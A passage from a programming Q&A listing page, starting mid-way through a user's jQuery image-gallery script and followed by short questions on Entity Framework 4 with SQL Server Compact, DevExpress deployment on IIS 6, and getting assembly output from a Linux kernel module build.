img").each(function(i) { $(this).mouseover(function() { $(this).addClass("Hot"); }).mouseout(function() { $(this).removeClass("Hot"); }).click(function() { //Load Big Image setImage($(this)); }); }); holder.css("display", "none"); //Load First Image var img = new Image(); img.onload = function() { imgMain.attr("src", img.src); setCaption($("#Image1").attr("alt")); //Hide Loading Message $("#LoadingGalleryText").css("display", "none"); $("#LoadingGalleryOverlay").css("display", "none"); } img.src = $("#Image1").attr("bigimg"); } }); } }); } function showCaption() { if (captionState == 0) { $("#CaptionTab").attr("src", globalPath + "/Images/CaptionTabHot.jpg"); captionHolder.css("display", "inline").css("left", imgMain.position().left + "px").css("top", imgMain.position().top + "px").css("width", imgMain.width() + "px").effect("slide", { "direction": "up" }, 500, function() { captionState = 1; }); } } function hideCaption() { if (captionState == 1) { captionHolder.toggle("slide", { "direction": "up" }, 500, function() { $("#CaptionTab").attr("src", globalPath + "/Images/CaptionTab.jpg"); captionState = 0; }); } } function setCaptionHideTimer() { captionHideTimer = window.setTimeout(hideCaption,captionHideTime); } function clearCaptionHideTimer() { if(captionHideTimer) { window.clearTimeout(captionHideTimer); captionHideTimer = null; } } function showThumbs() { if (holderState == 0) { $("#ThumbTab").attr("src", globalPath + "/Images/ThumbTabHot.jpg"); holder.effect("slide", { "direction": "down" }, 500, function() { holderState = 1; }); } } function hideThumbs() { if (holderState == 1) { if (jQuery.browser.safari) { holder.css("display", "none"); $("#ThumbTab").attr("src", globalPath + "/Images/ThumbTab.jpg"); holderState = 0; } else { holder.toggle("slide", { "direction": "down" }, 500, function() { $("#ThumbTab").attr("src", globalPath + "/Images/ThumbTab.jpg"); holderState = 0; }); } } } function setThumbsHideTimer() { thumbsHideTimer = window.setTimeout(hideThumbs,thumbsHideTime); } function clearThumbsHideTimer() { if(thumbsHideTimer) { window.clearTimeout(thumbsHideTimer); thumbsHideTimer = null; } } function setImage(image) { //Show Loading Image loadingImage.css("display", "inline"); var img = new Image(); img.onload = function() { //imgMain.css("background","url(" + img.src + ")").css("display","none").fadeIn(250); imgMain.attr("src", img.src).css("display", "none").fadeIn(250); setCaption(image.attr("alt")); //Hide Loading Image loadingImage.css("display", "none"); }; img.src = image.attr("bigimg"); } function setCaption(caption) { $("#CaptionText").html(caption); //alert($("#CaptionText").html()); /* if (caption.length 0) { $("#CaptionText") .css("display", "inline") .css("left", imgMain.position().left + "px") .css("top", imgMain.position().top + "px") .css("width", imgMain.width() + "px") .html(caption); $("#CaptionOverlay").css("display", "inline") .css("height", $("#CaptionText").height() + 36 + "px") .css("left", imgMain.position().left + "px") .css("top", imgMain.position().top + "px") .css("width", imgMain.width() + "px"); } else { $("#CaptionText").css("display", "none"); $("#CaptionOverlay").css("display", "none"); } */ } Please if anyone could help, it would be greatly appreciated! Thanks in advance. Justin

    Read the article

  • EF4, self tracking, repository pattern, SQL Server 2008 AND SQL Server Compact

    - by Darren
    Hi, I am creating a project using Entity Frameworks 4 and self tracking entities. I want to be able to either get the data from a sql server 2008 database or from sql server compact database (with the switch being in the config file). I am using the repository pattern and I will have the self tracking entities sitting in a separate assembly. Do I need two edmx files? If so, how do I generate only one set of STE's in the separate assembly? Also do I need to generate two context classes as well? I am unsure of the plumbing for all this. Can anyone help? Darren I forgot to add that the two databases will be identical and that the compact version is for offline usage.

    Read the article

  • How to deploy DevExpress to server?

    - by Earlz
    Hello I am needing to deploy a project using DevExpress controls to an IIS 6.0 server. The project loads fine and until I add in the DevExpress controls. When trying to load the site I get the error Could not load file or assembly 'DevExpress.Web.v9.3, Version=9.3.4.0, Culture=neutral, PublicKeyToken=b88d1754d700e49a' or one of its dependencies. The system cannot find the file specified What am I doing wrong? I've tried installing the controls on the server and also just copying all of the assembly dlls to the bin/ folder of the application but I can not get this error to go away. How do I get it to work?

    Read the article

  • How to keep asm output from Linux kernel module build

    - by fastmonkeywheels
    I'm working on a Linux kernel module for a 2.6.x kernel and I need to view the assembly output, though it's currently being done as a temporary file an deleted afterwords. I'd like to have the assembly output mixed with my C source file so I can easily trace where my problem lies. This is for an ARMv6 core and apparently objdump doesn't support this architecture. I've included my makefile below. ETREP=/xxSourceTreexx/ GNU_BIN=$(ETREP)/arm-none-linux-gnueabi/bin CROSS_COMPILE := $(GNU_BIN)/arm-none-linux-gnueabi- ARCH := arm KDIR=$(ETREP)/linux-2.6.31/ MAKE= CROSS_COMPILE=$(CROSS_COMPILE) ARCH=$(ARCH) make obj-m += xxfile1xx.o all: $(MAKE) -C $(KDIR) M=$(PWD) modules clean: $(MAKE) -C $(KDIR) M=$(PWD) clean

    Read the article

< Previous Page | 215 216 217 218 219 220 221 222 223 224 225 226  | Next Page >